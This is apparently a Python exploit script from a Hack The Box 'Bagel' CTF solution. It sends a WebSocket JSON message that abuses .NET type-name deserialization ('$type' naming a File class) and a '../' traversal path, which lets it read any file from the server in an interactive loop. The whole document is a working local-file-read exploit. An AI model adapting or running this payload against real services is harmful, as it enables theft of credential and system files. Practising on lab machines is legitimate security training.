CTF/HTB/bagel/lfi.py

#!/usr/bin/python3
import sys, websocket, json

def lfi(file):
    ws = websocket.WebSocket()
    ws.connect("ws://bagel.htb:5000/")
    order = {"RemoveOrder": {"$type": "bagel_server.File, bagel", "ReadFile": f"../../../../../..{file}"}}
    data = str(json.dumps(order))
    ws.send(data)
    output = ws.recv()
    j = json.loads(output)
    print(j["RemoveOrder"]["ReadFile"])

if __name__ == '__main__':
    while True:
        lfi(input("> "))